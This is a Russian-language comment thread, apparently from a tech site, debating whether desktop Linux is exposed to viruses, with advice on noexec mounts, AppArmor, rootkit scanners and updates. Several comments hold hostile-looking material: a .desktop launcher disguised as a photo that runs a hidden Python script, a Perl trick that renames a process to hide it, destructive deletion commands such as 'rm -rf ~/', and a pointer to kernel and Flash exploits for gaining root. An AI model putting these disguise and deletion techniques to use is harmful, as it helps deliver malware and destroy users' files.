никто особо тщательных усилий на создание атакующих программ не предпринимал


Ну так и писатели антивирусов не предпринимали пока никаких усилий в этом направлении. В тот момент, когда под Линукс появятся вирусы (настоящие, а не в теории и «дай посмотреть»), возникнет также рынок антивирусных решений, примерно как сейчас в Виндовс. Свято место пусто не бывает.
Да эти решения бесполезны по большей части. Вот сейчас очередная волна всякой СМСной дряни, которая просачивается на компьютер и никак не выносится.

Я ж специально описал типичные примеры, куда полезут вирусы, чтобы обосноваться но компьютере. И для защиты надо не системы отстрела делать (как во всяких «охранных» софтинах в винде), а надёжные замки ставить, типа расширенного внедрения SELINUX, или системы централизованного контроля целостности ПОЛЬЗОВАТЕЛЬСКИХ файлов. В винде такое уже поздно городить, ибо система неповортливая и уже разогнавшаяся. А в линуксе самое время, вот только не видно особо усилий в этом направлении, так что когда волна ВНЕЗАПНО попрёт, окажется, что никто этого «не ожидал».
Интересно если я работаю из-под юзера а бинарники в / смонтированы на ro разделе — что сможет сделать вирус? Попросить запустить его от рута и ремонтнуть раздел на запись? Ну смешно же.
А может сначала прочитать статью? Особенно те строки, где говорится о начальных условиях.
Может попытаться произвести эскалацию привилегий через известные дыры. Дальше возможны варианты. Вы систему каждый день обновляете?
Не очень понял про NAT — речь же о том, что вредоносный код уже в вашей системе (через веб/почту/флэшку) и вы в шаге от того чтобы его собственноручно исполнить.
>через дырку в libflash
Ключевое слово — Flash, а не Linux ;)
А толку? На windows тоже много чего ломается не через системные вызовы.
По поводу rm -rf ~/
Если пользователь идиот, то вряд ли ему мозгов добавит даже супер-ось. В тех же виндах, что помешает ему ввести
del c:\*.* /q /f /s
Возможно, часть проблем можно решить если /home вынести на отдельный раздел и смонтировать с опцией noexec (ну и /tmp)
а так же сделать владельцем root на критически важные папки ~/.kde/Autostart и ~/.config/autostart и другие
мм, простите, ведь год назад было:
1. itua.info/news/security/16333.html
2. community.livejournal.com/bezopnet/5132.html

есть масса публичных багов и _не публичных_, количество *nix машин становится настолько велико, что системой интересуются и анализируют код. Чем больше кода, тем более вероятна ошибка в нем, к томуже код открытый. Мало новостей? Большие компании часто скрывают взломы своих систем, маленькие компании рады бы пиарится взломом, да беда в том что они никому не интересны.

мм, простите, ведь год назад было:
1. itua.info/news/security/16333.html
2. community.livejournal.com/bezopnet/5132.html

есть масса публичных багов и _не публичных_, количество *nix машин становится настолько велико, что системой интересуются и анализируют код. Чем больше кода, тем более вероятна ошибка в нем, к томуже код открытый. Мало новостей? Большие компании часто скрывают взломы своих систем, маленькие компании рады бы пиарится взломом, да беда в том что они никому не интересны.

Проблема есть, и в ближайшее время будет становится более острой, вина тому «мамочек»\доморощенных админов с убунтой, кубунтой, сюзи, которые думают что вопросы безопастности их не касаются. И будут ботнеты с юникс машин, владельцы которых, так же как и миллионы пользователей окон, не будут знать что их машина заражена. Проблема есть, и в ближайшее время будет становится более острой, вина тому «мамочек»\доморощенных админов с убунтой, кубунтой, сюзи, которые думают что вопросы безопастности их не касаются. И будут ботнеты с юникс машин, владельцы которых, так же как и миллионы пользователей окон, не будут знать что их машина заражена.
блин, чтот непонял почему склонировало…
извиняюсь за первый вариант, чтото глюкнуло. угнетает отсутвие редактирование коментов =(
читать следует как:

мм, простите, ведь год назад было:
1. itua.info/news/security/16333.html
2. community.livejournal.com/bezopnet/5132.html

есть масса публичных багов и _не публичных_, количество *nix машин становится настолько велико, что системой интересуются и анализируют код. Чем больше кода, тем более вероятна ошибка в нем, к томуже код открытый. Мало новостей? Большие компании часто скрывают взломы своих систем, маленькие компании рады бы пиарится взломом, да беда в том что они никому не интересны.

Проблема есть, и в ближайшее время будет становится более острой, вина тому «мамочек»\доморощенных админов с убунтой, кубунтой, сюзи, которые думают что вопросы безопастности их не касаются. И будут ботнеты с юникс машин, владельцы которых, так же как и миллионы пользователей окон, не будут знать что их машина заражена.
UFO just landed and posted this here
UFO just landed and posted this here
Клинические случаи когда пользователь сам запустит вирус, сам введет пароль рута не лечатся ничем.
Тут только доступ к компьютерам только при наличии справки о IQ >90 и умении читать поможет.

Статья ни о чем, точно так же как антивирусы для linux.
Главный признак вируса способность размножаться и распространяться.
А в никсах с этим огромные проблемы.
Наиболее популярные win style:
Флешки — неработоспособно в зародыше, авто запуска нет.
Сеть, через дыры в системе — в отличие от винды заплатки выпускаются максимально оперативно и дырок с удаленным запуском под рутом что то не наблюдается.
Ссылка в браузере(аське, жабере, скайпе) — даже если сработает(если сработает!) запуститься только с правами пользователя, вот он единственный способ распространения и то над ним мелькает призрак SElinux и туманные перспективы.
О чем нам это говорит? А о том что для эпидемий вирусов linux максимально враждебен.
сеть через дырки, всегда живо. многие не обновляются по принципу — «ну оно же РАБОТАЕТ, ничего не трогай». а после обновлений начинаются проблемы и перенастройка\падения. пока все не отладиш

ссылки отлично работают, и снова же через баги в системе. Чуток выше говорили про IQ>90, в нормальных условиях, даже без антивиря, с ровно настроенной системой и последними обновлениями винда не так уж и беззащитна.
>сеть через дырки, всегда живо. многие не обновляются по принципу — «ну оно же РАБОТАЕТ, ничего не трогай»
Их проблемы. Но сама идеология Линукса предполагает, что систему нужно держать в актуальном состоянии, а менеджеры пакетов этому всячески способствуют. Для любителей «работает, не трогай» есть LST релизы, в которых не меняют мажорные версии приложений.
Короче ботнет из пары сотен дубов сделать еще реально, а вот организовать эпидемию уже нет
>>Короче ботнет из пары сотен дубов сделать еще реально, а вот организовать эпидемию уже нет

Думаю, точно так же считали Майкрософт и прочие специалисты по безопасности до появления червя ILOVEYOU :)
Увы, но под никсы реально во первых только скриптовые вирусы писать, а во вторых они будут исправно работать только на одной версии одного дистрибутива, а на других дырки может и не оказаться
Какая разница — скрипт или бинарный файл, если заложенную функцию выполняет? Это не «увы… только скриптовые вирусы», а «уф, к счастью только скриптовые вирусы» :)
Немного не понял про установку вируса в один клик — это как? В официальных репах все пакеты подписаны, так что туда проникнуть шансов ноль.
Немного не понял про установку вируса в один клик — это как? В официальных репах все пакеты подписаны, так что туда проникнуть шансов ноль.
Ну как… На каком-нить сайте описывается «новая прикольная программка», которая кроме обещанных функций реально содержит вредоносный код. А потом приписано: «В официальных репах её пока нет, поэтому нужно добавить вот этот репозиторий (рассказывается как это сделать) либо скачать бинарный deb/rpm-пакет». Некоторые поведутся и скачают. А потом ещё через sudo и права рута дадут этой программке на установку, куда она пожелает.
И снова, установка совсем не в один клик. Ну и далее: «Некоторые» — это ключевое слово в вашем сообщении. Опять-таки, никакой эпидемии или длительного распространения, т.к. серьёзные сайты такое размещать не будут, а такой сайт мгновенно попадёт во всевозможные базы фишинговых и зловредных сайтов и перестанет открываться у юзеров.
rkhunter + chkrootkit в помощь :) На сервера давно ставлю. Еще очень хорошое средство — fail2ban (для полного щастья).

Если по-хорошему, мир спасет /home и /tmp на отдельном разделе, монтируемом с noexec, и пользователь, не знающий пароль рута вообще (последнее — совсем уж в идеале). Что в целом проблему решит, за исключением совсем уж полных идиотов, которые таки поставят себе что не надо, но от такого защититься невозможно в принципе :( Только сбором сигнатур, что приводит нас к идее антивирусов :)
Честно говоря не проверял, но, мне кажется, это может сработать на noexec каталоге — вирус на скриптовом языке, запускаемый ссылкой-ярлыком ".desktop" (ubuntu, gnome)
seriy@seriy-desktop:~/Desktop$ cat photo.jpg.desktop

[Desktop Entry]
Encoding=UTF-8
Version=1.0
Type=Application
Terminal=false
Icon[ru_RU]=gnome-panel-clock
Exec=env python ~/.virus/virus.py
Icon=~/.virus/jpeg-icon.png

Если нет — поправьте
Да, вы правы, такое должно сработать.

Скрипты получаются мощной дырой… Запретить интерпретаторам принимать файлы из home разве что, но это пользователю делать весьма нетривиально, если возможно, к тому ж в скриптах сейчас хранится ряд пользовательских настроек (надо б, если по-хорошему, избавиться от этой практики...)
s/virus.py/virus.pyc/ — для пущей конспирации
впервый раз на файлах .desktop вылазит запрос на подтверждение
так что тут нужно все проверять
как среагирует система на запуск такого файла
огромной дыры тут точно нет
«никто особо тщательных усилий на создание атакующих программ не предпринимал»
Да ладно Вам! Большинство серверов работают на линуксе. Не думаю, что никто не пробовал пробраться в систему.

В статье Вы описываете метод загрузки вируса через глюк во флеше. Допустим. Вирус скачался. Как он запустится? Для того, чтобы приложение можно было запустить, нужны файлу установить права на запуск. Тогда необходимо пользователя самого ввести команду или просто в менюшке выставить права, но тогда вся Ваша статья теряет смысл, т.к. это уже проблема неграмотности пользователя, от этого невозможно защитится и вместо установки прав доступа на файл гораздо проще попросить пользователя самого удалить все файлы из домашней директории. Получается, что без участия пользователя этими методами систему не пробить, а с его участием вообще не имеет значения, какая система, т.к. пользователь сам её уничтожает.
Минус том, что если ктото действительно заинтересованный захочет, он пролезет и никто об этом не узнает. Так в любой ОСи. Минус в частности мелкософта в том, что машин много, много идиотов хотят заработать\прославится, появляются эпидемии. Если бы не эпидемии, баги могли бы жить по несколько лет и ими бы пользовались как бекдуром
Я думаю слово «идиотов» здесь лишнее. Те кто с помощью производства и использования мелвари успешно зарабатывают в наше время очень часто весьма и весьма отличные профессионалы.
Кстати слово «прославится» думаю тоже здесь лишнее. Процент действительно распространной мелвари, созданной для забавы в наше время ничтожно мал. Теперь это обычно just business.
Если так мыслеть, то практическм любую систему можна взломать: везде есть автозапуск, чтоб все грузилось при старте, везде есть сиспапка, чтоб маскирироваться, везде есть дырявые браузеры, для сплоитов…
Единственное сыльное оружые — умный мозГ, который смотрит на все это.
Я не знаю, для кого это было секретом. В любой системе с правами доступа можно получить эти права и натворить черт знает что. Бэкапы + прокладка между стулом и монитором спасут отца русской демократии, даже если он запускает скрипты присланные 16-й летней Анечкой, которая утверждает, что это её фотки с пляжа. Нельзя человеку дать свой мозг, а даже если дать, в виде программы, которая будет после каждого клика мышкой спрашивать:«Вы уверены, что это Вы выполняете команду, а не вредоносный вирус?», так он отключит её, после часа использования.

Я бы задумался о функции резервного копирования, которая бы работала с момента установки системы, и думала за пользователя, что стоит сохранять, а что нет, ну или спрашивала бы иногда. Учитывая, что объёмы жестких дисков растут, их стоимость падает, не самый плохой вариант, да? И гори оно все огнем, что из под учетки пользователя rm -rf ~/ выполнили, можно незаметно восстановить, а скрипт который это сделал удалить, и «мама, которую пересадили на убунту» даже не заметит, что вирус был. У нее будет отчет об ошибке, который большинство пользователей не читает.
«Психоз в порту» называется. Плывёт себе вполне надёжный корабль. А вокруг всякие корыта тонут, и с них орут: «вы не задавайтесь, вас айсбергом можно потопить — вот рулевой будет пьяный, и капитан пьяный, и тот что на мачте в «вороньем гнезде» в хлам, и хана вам от айсберга!». А в ответ с корабля: «ну гребите уже к берегу, чтоли. Вам тонуть не привыкать, быстро доплывёте. И айсберг, айсберг нам покажите. Вот где-нибудь вдоль нашего маршрута по тропическим водам — вдруг на нём пингвины будут, хоть сфотографируемся!»
Да, была такая история, помню. Много народа сгибло разом, даже фильм сняли.
Кстати непотопляемым считался.
В том-то и дело. Лучший способ огрести проблем это переоценивать свои возможности (например защищенность и безопасность) и недооценивать возможности «противника». Всего этого, а также самоуверенности, у пользователей Linux сколько угодно.
Ждем только кого-то, кто устроит им «веселую жизнь».
UNIX'у в свое время «веселую жизнь» делали и ой как успешно.

Суть не в отсутсвии или наличии вирусов, а в том, что бороться с заразой не в пример легче, чем на windows.
Совсем неоднозначно. Кому проще бороться с заразой, пользователю, который знает, что заражение неизбежно, и с самого начала в курсе необходимости антивируса, файрволла и прочих средств, или тот, кто убежден, что «на его OS вирусов быть не может паапридилению!!!11»
?
А кто Вам сказал, что пользователи Linux считают, что на их системе «вирусов быть не может паапридилению!!!11»?

Что такое современная компьютерная зараза? Если это то, что можно подцепить через сеть, то linux с windows тут совершенно на равных: ради эксперимента попробуйте оставить linux-box с открытым ssh и паролем 12345 — что-то прилетит всенепременнейше.

Так отчего же мы не наблюдаем в сети неконтролируемых эпидемий linux-машин? Быть может все-таки оттого, что эта ОСь гораздо менее дружелюбна ко всякой заразе, чем ближайший конкурент?
> А кто Вам сказал, что пользователи Linux считают

Да добрая треть из отметившихся в этом посте искренне так считает, а обычно в таких темах их значительно больше половины.

> Так отчего же мы не наблюдаем в сети неконтролируемых эпидемий linux-машин?

Пока просто оттого, что десктопных компьютеров с Linux пока исчезающе мало. Пресловутые полтора процента пока совершенно не интересуют вирусо-трояно-бэкдоро-спайваре-малваре-писательную «сцену»
В свое время под винду было много just for fun вирусов, людьми двигали вовсе не денежные мотивы, им просто было интересно что-нибудь сломать. Таких любителей и под никсами немало, и в свое время удавалось сделать весьма рабочие вири, например Bliss, и это в то время, когда про Линукс вообще никто не знал! Но ведь даже нету единичных чудо вирусов, сделаных ради забавы, но сумевших проникнуть в сколько либо серьезное количество машин
Ну так пьяный капитан, пьяный рулевой, пьяный вперёдсмотрящий, радисты, сшибающие чаевые… Экипаж-то с корыт перевели… Вот и гадали, в какую сторону штурвал крутить, пока с айсбергом не поцеловались, да вместо метеосводок принимали новости спорта и биржевых торгов. А потом ещё и эвакуацию не смогли нормально организовать. Типично виндузятный подход, чего уж там.
UFO just landed and posted this here
(Занудно) Среди перечисленных потенциальных направлений взлома системы нет ровно ни одного Linux-специфичного. Уточните, пожалуйста, что делает слово «Linux» в заголовке и теле статьи.

Да, кстати, расскажите, пожалуйста, как «Вирус без проблем может выдавать себя за что угодно» при поставленном заранее условии «вирусу в /usr/bin не пробраться». Вот это, кстати, как раз потенциально может быть Линукс-специфичным.
$ cat a.pl
#!/usr/bin/perl

$0 = 'anything';

sleep 100;

$ perl a.pl &
[1] 3065
$ ps ax | grep anything
3065 pts/14 S 0:00 anything
3067 pts/14 R+ 0:00 grep anything
$ ls -l /proc/3065/fd/
итого 0
lrwx------ 1 grib grib 64 Янв 25 00:51 0 -> /dev/pts/14
lrwx------ 1 grib grib 64 Янв 25 00:51 1 -> /dev/pts/14
lrwx------ 1 grib grib 64 Янв 25 00:50 2 -> /dev/pts/14
l-wx------ 1 grib grib 64 Янв 25 00:51 7 -> pipe:[1040540]


И конкретно в случае с perl, лично я не знаю способа по работающему процессу узнать полный путь к скрипту.
$ ps axjf | grep anything
28682 3174 3174 28682 pts/14 3177 S 1000 0:00 | | \_ anything
$ ps axjf | grep perl
28682 3180 3179 28682 pts/14 3179 S+ 1000 0:00 | | \_ grep perl

$ ps -o args,comm | grep anything
anything perl


Имя скрипта-то как узнать?

имя скрипта — только из argv, при их замене — невозможно.
но тем не менее замаскироваться под "/usr/bin/init" уже не получится, если сравнить какой argv[0] и название бинарника. Если же прога бинарная, то даже при setproctitle() — всё равно ps -c покажет настоящее имя.
Это если вы скрипт будете запускать посредством «perl a.pl». Для чего, в случае вируса, письмо с вирусом должно будет содержать текст наподобие «Вот моя голая фотка с пляжа, открой её командой perl myfotka.jpg». Что наивно исключительно избыточно.
Если же это будет запускаемый скрипт, запустившийся по хэшбэнгу, то ps -o args,comm покажет не «anything perl», а «anything a.pl».

Но переименование процесса — это опять же не специфика Линукса, это фактически все умеют. Вот что есть специфика линукса — так это механизмы получения информации о процессах, наподобие /proc (кстати, взгляните на досуге на /proc/pid-процесса-скрипта/exe), которые таки позволяют от этого хоть немножко, да обезопаситься. Поэтому вопрос к автору остаётся: что в заголовке и теле статьи делает слово Linux, если статья не упоминает ничего линуксо-специфичного?
> Если же это будет запускаемый скрипт, запустившийся по хэшбэнгу

Шебангу. Что мешает вирусу, запустившемуся по шебангу, перезапуститься через perl?

> кстати, взгляните на досуге на /proc/pid-процесса-скрипта/exe

Я в курсе. Там в любом случае будет симлинк на бинарник перла.

> Поэтому вопрос к автору остаётся

Я с этим и не спорил, но мой вопрос тоже остаётся: у кого-то в системе непонятно откуда работает вот такой вот anything. Как узнать имя скрипта?
Думаю, статья на грани бреда. Линукс уверенно лидирует на рынке серверных ОС, и там безопасность куда важнее чем на десктопах. И постоянно идет борьба блекхэтов и создателей софта. Броузер можно запустить в jail'е.
По поводу переменной PATH надо сказать что если процесс (так называемый «вирус») поменяет себе переменную окружения, то она не поменяется для остальных процессов. Для того чтоб пользователь что-то ощутил, вирусу необходимо поменять .bashrc, в моей лично системе этот файл принадлежит руту, и ловить там вирусу нечего.
Опять же нет проблем запретить исполнение программ из /home, /tmp и /var/log (их там и не должно быть у нормального пользователя).
Опять же непонятно как человек будет получать вирус, и вообще что такое вирус. Лично я не понимаю что такое вирус в линуксе. Это какая-то херня, которая злоупотребляет уже данными ей правами в черных целях :-)
В Линуксе полно дополнительного софта для безопасности, и нет никаких проблем жестко ограничить права той или иной программе. Как пользователь получит вирус? Если он сознательно делает chmod +x virus; ./virus то пусть пиняет на себя. Само по себе ведь ничего не запустится по двойному клику hotchick.jpg.exe, а броузер, как уже было сказано, можно запихнуть в chroot.
.bashrc есть у каждого пользователя свой в домашней директории. дописать PATH можно и в нем

seriy@seriy-desktop:~$ ls -la | grep bashrc
-rw-r--r-- 1 seriy seriy 2298 2008-04-19 09:29 .bashrc


Если вы сделали его хозяином root, то это так-себе решение (не для массового пользователя)
.bashrc есть у каждого пользователя свой в домашней директории.

Только далеко не у каждого пользователя он интерпретируется/запускается при входе пользователя в систему.
Но даже вирус и правда пролезет в систему описанным способом, его будет сравнительно легко вычистить. Дело в том, что линукс, в отличие от винды, можно загрузить вообще без графики, т.е. без исполнения любого кода, в который мог попасть вирус. После чего залогиниться под рутом (чтобы не выполнять зараженный юзерский .bash_profile) и спокойно себе просматривать конфиги на предмет вируса. Конфиги в линуксе ТЕКСТОВЫЕ, редактируются ЛЮБЫМ ТЕКСТОВЫМ РЕДАКТОРОМ. В крайнем случае, можно переместить профиль пользователя в другое место, создать пустой новый — гарантированно без вируса — а потом уже ценную инфу, вроде картинок и документов, переносить по частям.

Более того, винды всего несколько вариантов — XP, Vista, 7, 2008. А линуксов десятки. Соответственно, больше вероятность того, что, к примеру, написанный для федоры вирус в генте не заработает. Недавно видел руткит, который почему-то думал, что lsof лежит в /usr/local/sbin. А у меня она оказалась в /usr/local/bin и сдала подлый руткит с потрохами. И часа бедолага не прожил.

Резюме — причин волноваться не вижу.
> Недавно видел руткит, который почему-то думал, что lsof лежит в /usr/local/sbin. А у меня она оказалась в /usr/local/bin и сдала подлый руткит с потрохами.

Это еще что, у меня в системе вообще нет lsof :) Arch.
«Говорить о том, что Linux нельзя взломать, все равно что говорить о том, что Титаник не может утонуть.» — К.Касперски, цитата не дословна.

В настоящий момент Линукс безопаснее лишь по причине малой распространенности — это некий «Неуловимый Джо» в плане безопасности.

— Права доступа? Взлом обычной учетки + какая-нибудь эксклюзивная найденная уязвимость (весь код открыт!) для повышения прав.
— Много разных систем? Драйвера для ATI распространяются одним файлом, что удалось одним, удастся и другим.
— Вирус легко вычислить? Да кто из вас, таких упертых фанатиков «Линукс — безопасен» будет вообще вычислять, что у него в системе вирус?
— И наконец. Под Линукс есть немалое количество руткитов.
> В настоящий момент Линукс безопаснее лишь по причине малой распространенности — это некий «Неуловимый Джо» в плане безопасности.

«Свежо придание, да верится с трудом» — народная мудрость, цитата не дословна.

Поинтересуюсь, но наверное бесполезно это…
Вы комментарии читали к топику?.. «Весь код открыт» — такое явное трололо, что смотреть больно…
>— Много разных систем? Драйвера для ATI распространяются одним файлом, что удалось одним, удастся и другим.

Миф… Я тоже могу в одном файле десятка два заархивить. И вы забываете, что эти драйвера АТИ работают под строго определённой комбинацией системных библиотек и ядра.
Ссылки на руткиты в студию
экий ты смешной
да в винде давно уже это делается. тот же аутпост выдает алерты на каэжое изменение критической ветки реестра или изменения хеш-суммы исполняемого файла
Я знаю всего один пример удачной реализации безопасности — браузер:
* Приложения запускаются в безопасном окружении
* Использует свой фрейворк отображения (DOM)
* Доступ к каждому локальному документу осуществляется посредством активности пользователя
* Сетевая активность сведена к HTTP GET, а также ограниченному по домену HTTP POST
* Время жизни ограничено временем жизни окна

Можно запускать приложения в jail, ограничивать сетевую активность, запрещать исполнение приложений из домашнего каталога, изменение конфигов создающих новые процессы.
Да блин. Конечно, если какой-то зелёный человечек влепит линукс не зная что с ним делать и как вообще с ним работать, то теоретически из его машины можно сделать точку ботнета. Но:

1) В линукс в отличие от винды «паразитному» процессу не так-то просто скрыться. Тот же ps — всегда его покажет
2) Если процесс захотел замаскироваться под какой-то уже существующий — то просто тупо на ночь ставится перестановка ВСЕХ пакетов.
3) Даже если вирус все-таки не найти, то переставить систему оставив почти все настройки в целости и сохранности (поперетаскивать нужное из ~/.* и ~/.config/*) не составит труда вообще (эт аргумент против вечных «голых» перестановок windows)
4) Практически исключено написание деструктивных вирусов под Linux (да и под Windows) — ибо они сейчас не имеют смысла вообще
5) Вирус можно откопать даже удалённо, даже не запуская сам этот линух (т.е. просто отнеся винт знакомому админу). Это в разы проще чем копаться в Windows пытаясь её «оживить».
6) Как уже неоднократно замечали — если чувствуется что-то неладное с профилем: ребут, новый профиль, перенос данных. Всё.
7) Утопические случаи захвата прав root не рассматриваем, ибо если уж используете линух, то и используйте всю его мощь: обновляйтесь, обновляйтесь и ещё раз обновляйтесь =). И такая возможность практически будет исключена (по крайней мере для одновременного взлома тысяч машин, а не одной какой-то конкретной — в последнем случае уже идёт поиск касяков на конкретной машине после получения к ней хоть какого-то доступа).

В общем. Тут не microsoft плохо, linux хорошо. Тут открытость и массовость — хорошо, а закрытость — ужасно.
вы как то все забыли про AppArmor
я глянул на дефолтные правила для ОгнеЛиса
/etc/apparmor.d/usr.bin.firefox*
систему разрешается юзать только на чтение
а дом
  @{HOME}/ r,
  @{HOME}/** rw,
  @{HOME}/Desktop/** rw,
  @{HOME}/Firefox_wallpaper* rw,
  audit deny @{HOME}/.ssh/** mrwkl,
  audit deny @{HOME}/.gnome2_private/** mrwkl,
  audit deny @{HOME}/.gnupg/** mrwkl,
  @{HOME}/.mozilla/ rw,
  @{HOME}/.mozilla/** rw,
  @{HOME}/.mozilla/**/*.sqlite* k,
  @{HOME}/.mozilla/**/.parentlock k,
  @{HOME}/.mozilla/plugins/** rm,
  @{HOME}/.mozilla/**/plugins/** rm,
  @{HOME}/.icedteaplugin/ rw,
  @{HOME}/.icedteaplugin/** rw,
  @{HOME}/.adobe/ rw,
  @{HOME}/.adobe/** rw,
  @{HOME}/.macromedia/ rw,
  @{HOME}/.macromedia/** rw,
  @{HOME}/.java/ rw,
  @{HOME}/.java/** rwk,
  @{HOME}/.mozilla/**/extensions/** mixr,

топикстартер опишите как вы впарите зловредного сайта трояна с закреплением в системе
только подробнее, учитывая права юзверя (не рут)
Вопрос проникновения здесь не рассматривается. Это отдельная тема.
Рассказываю как.
На огнелисе у вас наверняка стоит флеш-плеер который не обновляеться
Далее смотрим по ссылке milw0rm.com/search.php?dong=Linux нужную нам версию

В итоге получается дырявое ядро + дырявый флеш плеер = полный доступ к системе
и никакие дефолтные права огнелиса вас не спасут
Для большинства этих атак нужны права root. Что очевидно. Это раз. А два — так а зачем ставить адобовский необновляемый плэйер, когда есть родные swfdec и gnash? Которые и по качеству лучше.
Уважаемый вы не поняли, root'a мы как раз и получим через дырку во флеш — плеере
Как? О.о флеш плеер не от рута пускается. Плюс еще есть всякие apparmor'ы, ему можно сказать, что флеш имеет только RO доступ к FS и усе, плакали все твои эксплойты.
А ежели таки получится юзера заполучить, то рута будет получить куда сложнее. А без рута вирус не сможет вообще никак скрыться. chrootkit такую заразу на уря найдет.
Увы, эти все рассуждения — теория, а на практике за последние лет 10 ни одной эпидемии вирусов под Линукс, хотя общее число пользователей более чем достаточно для организации эпидемии.
Чего то почти все эксплойты x86 only во первых (у меня уже не заработают), а во вторых часто вижу нужную версию ядра <19.
Плюс вы хоть читаете security news'ы? Большую часть этих дыр уже обсуждали и выпустили обновления, их закрывающее. Итого своевременные апдейты спасут отца русской демократии.
Наверное многие уже писали, но первая реакция на текст: А что, сложно права доступа на все эти 'опасные' файлы автозапуска поменять? Пусть ими владеет root:root, а для всех остальных будет разрешено только чтение.

А насчёт rm -rf ~/ Так и в Windows такая прелесть есть: rd /s /q (и путь куда-нибудь).

В Bash можно всё же хоть как-то от этого защититься. Например, сделать alias для комманды rm, на какой-нибудь скрипт, который проверяет список удаляемых файлов на важность. А про Windows я не знаю.
я предлагаю написать концепт дрянь которая при заходе на сайт запускает Gedit
этого вполне достаточно
ваше имя сразу станет знаменитым
а так мы только языками чешем
Я админ со стажем… и на один из моих тестовых серверов однажды пробрался руткит…

Дело в том, что на тестовом сервере я пытался и игрался с новым софтом, с которым ещё не сталкивался, и вот однажды мучая почтовый сервер, я создал пользователя support с паролем из рядда 123456 (да системного пользователя ), была беда с правами и этому пользователя я дал права рута ;)

через неделю заходя в шелл вижу что последний логинился не я, ну и дальше полез по логам. был создан новый пользователь от его имени были загружены файлы в архиве что-то вроде game.tar.gz ну и собсвенно на интерфейсе сервер стал прослушивать новый порт.

руткит никакими свежими сканерами не палился.

на лицо были действия бота :)

В общем итог простой.
1 меняйте порт ссх сервера на что-то далёкое 27ххх
2 никогда не используйте простые пароли
3 используйте ключи для ссх.
4 заглядывайте в логи либо оповещалку, что шлёт вам емейл при входе кого угодно в шелл.
ну и регулярные апдейты ;)
Пункт 1 не нужен при исполнении 3. Уж лучше port knocking, если совсем паранойя.
Тема бред. Во первых то что Linux так же как и мак не такие массовые, Вирусы под них пытаются написать достаточно давно. Особенно под Мак. Да только взломать мак, грамотно настроенный(выше писал человек что у него только ssh на ружу смотрит) это вообще из области фантастики. И не нужно недооценивать система разграничения прав в Linux… не все так просто. Что бы писать такие посты, вы бы удосужились пруфлинками на сущестующие вирусы или хоть что-то… или вообще пробили бы почву.
В общем это, все говорящие про неуловимого Джо! Ну давайте, напишите вирус да такой, чтобы он заразил хотя бы 0.5% Линукс машин! Чего воздух то сотрясаете? Вам тут уже подсказки люди делают.
«через дырку в libflash» А ведь верно говорите
Вирусы которые «влетают через дыры» и вырусы «запусти_меня.exe» совершенно различные и боротся с ними надо совершенно по разному.
Если к первым иногда появляются заплатки, то со вторыми на самом деле всё гораздо хуже чем думается:
_nnmclub.to/forum/viewtopic.php?t=420333
Вот кто мне даст гарании что по ссылке выше не вирус? НИКТО! И не важно что он не сломает саму ОС — он сломает пользовательские фаилы. Для меня как юзера фаилы в миллион раз важнее системы которую я могу перестановить за 10 минут.
Реальная проблема всех операционных систем (любых) — отсутствие песочниц как средство запуска программ по умолчанию. Даже в windows в этом плане лучше — у программ есть в контекстном меню: «запустить от имени пользователя». Естественно этого самого пользователя ещё нужно сначало создать и настроить ему правильные права. Но в linux даже этого нет. Лишь в qubes-os реально додумались до подобного (хотя они пошли даже слишком далеко в этом направлении — сделав песочницы витальными тормозными машинами). (но к счастью дистрибутивы на базе fedora не запускаются на моей системе)
Sign up to leave a comment.

Articles